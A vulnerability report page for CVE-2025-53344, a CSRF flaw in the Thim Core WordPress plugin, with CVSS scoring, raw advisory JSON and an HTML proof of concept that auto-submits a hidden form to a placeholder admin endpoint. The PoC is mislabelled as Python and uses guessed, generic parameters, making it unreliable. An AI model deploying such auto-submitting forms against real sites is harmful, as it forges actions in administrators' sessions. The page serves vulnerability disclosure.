Security Vulnerability Report
中文
CVE-2025-53344 CVSS 4.3 MEDIUM

CVE-2025-53344

Published: 2026-01-05 17:15:46
Last Modified: 2026-04-28 19:33:39

Description

Cross-Site Request Forgery (CSRF) vulnerability in ThimPress Thim Core allows Cross Site Request Forgery.This issue affects Thim Core: from n/a through 2.3.3.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Thim Core < 2.3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-53344 --> <!-- This PoC demonstrates the CSRF vulnerability in Thim Core plugin --> <!DOCTYPE html> <html> <head> <title>CSRF Attack Demo - CVE-2025-53344</title> </head> <body> <h1>Malicious Page - Do Not Access</h1> <p>This page demonstrates the CSRF vulnerability in Thim Core plugin.</p> <!-- Auto-submit form targeting the vulnerable WordPress site --> <form id="csrfForm" action="http://target-site.com/wp-admin/admin-post.php" method="POST" style="display:none;"> <!-- Replace with actual vulnerable action parameters --> <input type="hidden" name="action" value="thim_core_action"> <input type="hidden" name="thim_setting" value="malicious_value"> <input type="hidden" name="nonce" value=""> <!-- Add other required form fields based on actual vulnerable endpoint --> </form> <script> // Auto-submit the form when page loads document.getElementById('csrfForm').submit(); // Alternatively, use fetch API for more stealthy attack /* fetch('http://target-site.com/wp-admin/admin-ajax.php', { method: 'POST', credentials: 'include', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: 'action=thim_core_vulnerable_action&param1=value1&param2=value2' }); */ </script> <p>If you see this message, the attack may have failed.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53344", "sourceIdentifier": "[email protected]", "published": "2026-01-05T17:15:45.737", "lastModified": "2026-04-28T19:33:38.900", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in ThimPress Thim Core allows Cross Site Request Forgery.This issue affects Thim Core: from n/a through 2.3.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/thim-core/vulnerability/wordpress-thim-core-plugin-plugin-2-3-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}